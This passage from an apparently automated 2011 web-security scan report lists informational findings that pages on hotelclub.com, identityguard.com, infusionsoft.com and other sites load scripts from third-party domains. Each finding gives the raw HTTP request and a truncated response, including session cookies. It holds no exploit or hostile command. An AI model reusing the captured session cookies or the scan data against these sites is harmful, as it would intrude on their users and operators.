<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com
...[SNIP]...
</title>


       <script src="http://www.google.com/jsapi"> </script>
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&amp;v=2&amp;key=ABQIAAAAxlNjcILiMUNra09cJ_A5shTJTasaZLGu-S0MxpFJaRF7NywsZRSBRU3tj6CuxjTTjBB8JFKkUFVXXA" type="text/javascript"></script>


               <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
       </script>
...[SNIP]...
<!-- using cf_buildmap -->


<script type="text/javascript" src="http://hellometro.us.intellitxt.com/intellitxt/front.asp?ipid=27851"></script>
...[SNIP]...

24.230. http://www.hotelclub.com/common/adRevresda.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotelclub.com
Path:   /common/adRevresda.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /common/adRevresda.asp?channel=home&Section=main&adsize=728x90&pos=bottom HTTP/1.1
Host: www.hotelclub.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HTC=AppVer=1%2E0; anon=1129876971252011042422094; ASPSESSIONIDCCQRQCTQ=FDCOCPBANKNGOIFKLDNNOFAM; NSC_JOj4vajjejllb1veb0r04rbl5rcbheu=ffffffff09d7273245525d5f4f58455e445a4a422974

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
X-Powered-By: ASP.NET
Cteonnt-Length: 249
Content-Type: text/html
Cache-Control: private
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 12:09:46 GMT
Connection: close
Content-Length: 249

<script language="javascript" src="http://www.revresda.com/js.ng/CookieName=PRO2&site=HCL&platform=classic&secure=false&m=0&v=-803181687&language=en&currency=USD&subdomain=HCAU&channel=home&Section=main&adsize=728x90&pos=bottom&country=US"></script>

24.231. http://www.hotelclub.com/common/adRevresda.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotelclub.com
Path:   /common/adRevresda.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /common/adRevresda.asp?channel=home&Section=main&adsize=160x600&pos=external HTTP/1.1
Host: www.hotelclub.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HTC=AppVer=1%2E0; anon=1129876971252011042422094; ASPSESSIONIDCCQRQCTQ=FDCOCPBANKNGOIFKLDNNOFAM; NSC_JOj4vajjejllb1veb0r04rbl5rcbheu=ffffffff09d7273245525d5f4f58455e445a4a422974

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
X-Powered-By: ASP.NET
Cteonnt-Length: 252
Content-Type: text/html
Cache-Control: private
Date: Sun, 24 Apr 2011 12:09:46 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 252

<script language="javascript" src="http://www.revresda.com/js.ng/CookieName=PRO2&site=HCL&platform=classic&secure=false&m=0&v=-803181687&language=en&currency=USD&subdomain=HCAU&channel=home&Section=main&adsize=160x600&pos=external&country=US"></script>

24.232. http://www.identityguard.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.identityguard.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.identityguard.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=87049420402113036145977&ci=90226925; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 17:08:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; path=/
Set-Cookie: ASP.NET_SessionId=wzgnjd2knxvl1445vt0zjeet; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19532

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
</script>
<script src="http://leadback.netseer.com/dsatserving2/scripts/netseerads.js" type="text/javascript"></script>
...[SNIP]...

24.233. http://www.identityguard.com/gscc.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.identityguard.com
Path:   /gscc.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /gscc.aspx?mktp=Next&utm_medium=affiliates&hid=205557652&campid=14&c1=394717213CD1&c2=CD1&cenhp1=1 HTTP/1.1
Host: www.identityguard.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: URLParams=mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; cmTPSet=Y; CoreID6=87049420402113036145977&ci=90226925; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; __utmb=242046173.1.10.1303614598; 90226925_clogin=l=1303614597&v=1&e=1303615498489

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20039
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; path=/
Set-Cookie: ASP.NET_SessionId=njkcpvmavkvinriptaaozg45; path=/; HttpOnly
Set-Cookie: URLParams=id=78725&LangType=1033&mktp=Next&utm_medium=affiliates&hid=205557652&campid=14&c1=394717213CD1&c2=CD1&cenhp1=1; path=/
Date: Sun, 24 Apr 2011 03:10:16 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<link rel="SHORTC
...[SNIP]...
</script>
<script src="http://leadback.netseer.com/dsatserving2/scripts/netseerads.js" type="text/javascript"></script>
...[SNIP]...

24.234. http://www.identityguard.com/ipages/le33/letp30daysfree33.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.identityguard.com
Path:   /ipages/le33/letp30daysfree33.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ipages/le33/letp30daysfree33.html?mktp=Next&hid=205561061&campid=58&utm_medium=affiliates&c1=CD76&cenhp1=1 HTTP/1.1
Host: www.identityguard.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=87049420402113036145977&ci=90226925; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1

Response

HTTP/1.1 200 OK
Content-Length: 7637
Content-Type: text/html
Last-Modified: Tue, 08 Mar 2011 16:56:58 GMT
Accept-Ranges: bytes
ETag: "f19bfd6b1ddcb1:20a9"
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 20:10:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
</script>
<script src="http://leadback.netseer.com/dsatserving2/scripts/netseerads.js" type="text/javascript"></script>
...[SNIP]...

24.235. http://www.identityguard.com/ipages/le4/letp30daysfree1.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.identityguard.com
Path:   /ipages/le4/letp30daysfree1.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1 HTTP/1.1
Host: www.identityguard.com
Proxy-Connection: keep-alive
Referer: http://partners.nextadnetwork.com/z/371/CD1/id4+106163471
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 13510
Content-Type: text/html
Last-Modified: Tue, 08 Mar 2011 16:56:16 GMT
Accept-Ranges: bytes
ETag: "69d26fbdb1ddcb1:1e7c"
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 03:09:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
   <titl
...[SNIP]...
</script>
<script src="http://leadback.netseer.com/dsatserving2/scripts/netseerads.js" type="text/javascript"></script>
...[SNIP]...

24.236. http://www.identitymanagement.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.identitymanagement.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /?_kk=identity%20management&_kt=d37d8c67-315a-4919-abfc-41011051bd9e&gclid=CJvKs4D1tagCFeJ95Qodoi78Dg HTTP/1.1
Host: www.identitymanagement.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 19:45:34 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.4
Vary: Accept-Encoding
Content-Length: 11500

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Identity Management, Active Directory Administration, and Secure Workflow Automation</title>
<meta http-equiv="
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/css/styles.css" media="screen" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...
</SCRIPT> <SCRIPT SRC="http://sniff.visistat.com/sniff.js" TYPE="text/javascript"></SCRIPT>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s41.sitemeter.com/js/counter.js?site=s41TheDotNetFactory">
</script>
...[SNIP]...

24.237. http://www.infusionblog.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.infusionblog.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.infusionblog.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding,Cookie,User-Agent
Cache-Control: public, must-revalidate, proxy-revalidate
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 01:37:12 GMT
Expires: Mon, 25 Apr 2011 01:42:22 GMT
Pragma: public
Connection: Keep-Alive
Set-Cookie: X-Mapping-glbfbjch=6C1FE170452DF50DF4E2477FF60172A1; path=/
Last-Modified: Mon, 25 Apr 2011 00:42:22 GMT
Content-Length: 38973

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...
<div id="body-container"> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://www.lijit.com/wijitinit?uri=http%3A%2F%2Fwww.lijit.com%2Fusers%2Finfusionsoft&amp;js=1"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script>
...[SNIP]...
</script> <script type="text/javascript" src="//www.hellobar.com/hellobar.js"></script>
...[SNIP]...
</div> <script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script> <script id="aptureScript" type="text/javascript" src="http://www.apture.com/js/apture.js?siteToken=4dGf14t" charset="utf-8"></script>
...[SNIP]...
</script> <script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...
</script> <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

24.238. http://www.infusionsoft.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.infusionsoft.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.infusionsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:36:50 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: SESS9dd4d016da30aa43b8e02b23417e983e=a5ec6edf213d896f3903101ca35e8f6b; expires=Wed, 18-May-2011 05:10:10 GMT; path=/; domain=.infusionsoft.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 01:36:50 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Set-Cookie: LeadSource=www.infusionsoft.com; expires=Thu, 18-Aug-2011 19:23:30 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:49 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: visits=deleted; expires=Sun, 25-Apr-2010 01:36:49 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: LeadSource=www.infusionsoft.com; expires=Thu, 18-Aug-2011 19:23:30 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:49 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: visits=deleted; expires=Sun, 25-Apr-2010 01:36:49 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: LeadSource=www.infusionsoft.com; expires=Thu, 18-Aug-2011 19:23:30 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:49 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: LeadSource=www.infusionsoft.com; expires=Thu, 18-Aug-2011 19:23:30 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:49 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: ISFunnel=ms; expires=Tue, 26-Apr-2011 01:36:50 GMT; path=/; domain=.infusionsoft.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 30605


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
lang="en" dir
...[SNIP]...
<link type="text/css" rel="stylesheet" media="all" href="/sites/all/themes/infusion/css/elements.css?0" />
<script type="text/javascript" src="http://code.jquery.com/jquery-1.4.4.min.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

24.239. http://www.infusionsoft.com/about  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.infusionsoft.com
Path:   /about

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about HTTP/1.1
Host: www.infusionsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __v1192_=46276302; Type=%28none%29; ISFunnel=ms; __v1192_vexclude=false; __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,; __utmb=84293057.3.10.1303693620; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:39:06 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 01:39:06 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:39:05 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Type=%28none%29; expires=Wed, 25-Jun-2014 11:25:46 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: visits=deleted; expires=Sun, 25-Apr-2010 01:39:05 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:39:05 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: ISFunnel=ms; expires=Tue, 26-Apr-2011 01:39:06 GMT; path=/; domain=.infusionsoft.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 21053


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir=
...[SNIP]...
<link type="text/css" rel="stylesheet" media="all" href="/sites/all/themes/infusion/css/elements.css?0" />
   <script type="text/javascript" src="http://code.jquery.com/jquery-1.4.4.min.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...

24.240. http://www.infusionsoft.com/clients  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.infusionsoft.com
Path:   /clients

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /clients HTTP/1.1
Host: www.infusionsoft.com
Proxy-Connection: keep-alive
Referer: http://www.infusionblog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __v1192_=46276302; Type=%28none%29; Referer=http%3A%2F%2Fwww.infusionsoft.com%2F; ISFunnel=ms; __v1192_vexclude=false; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630; __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,; __utmb=84293057.5.10.1303693620

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:40:28 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 01:40:28 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Set-Cookie: Type=%28none%29; expires=Wed, 25-Jun-2014 11:27:08 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: visits=deleted; expires=Sun, 25-Apr-2010 01:40:27 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: ISFunnel=ms; expires=Tue, 26-Apr-2011 01:40:29 GMT; path=/; domain=.infusionsoft.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 31589


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir=
...[SNIP]...
<link type="text/css" rel="stylesheet" media="all" href="/sites/all/themes/infusion/css/elements.css?0" />
   <script type="text/javascript" src="http://code.jquery.com/jquery-1.4.4.min.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...

24.241. http://www.infusionsoft.com/demo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.infusionsoft.com
Path:   /demo

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /demo HTTP/1.1
Host: www.infusionsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,; __utmb=84293057.1.10.1303693620; __v1192_=46276302; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630; Type=%28none%29; ISFunnel=ms; __v1192_vexclude=false

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:37:00 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 01:37:00 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:59 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Type=%28none%29; expires=Wed, 25-Jun-2014 11:23:40 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: visits=deleted; expires=Sun, 25-Apr-2010 01:36:59 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:59 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:59 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: ISFunnel=ms; expires=Tue, 26-Apr-2011 01:37:00 GMT; path=/; domain=.infusionsoft.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 42382


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir=
...[SNIP]...
<link type="text/css" rel="stylesheet" media="all" href="/sites/all/themes/infusion/css/elements.css?0" />
   <script type="text/javascript" src="http://code.jquery.com/jquery-1.4.4.min.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...

24.242. http://www.infusionsoft.com/pricing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.infusionsoft.com
Path:   /pricing

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pricing HTTP/1.1
Host: www.infusionsoft.com
Proxy-Connection: keep-alive
Referer: http://www.infusionsoft.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __v1192_=46276302; Type=%28none%29; ISFunnel=ms; __v1192_vexclude=false; __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,; __utmb=84293057.3.10.1303693620; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:39:20 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 01:39:20 GMT
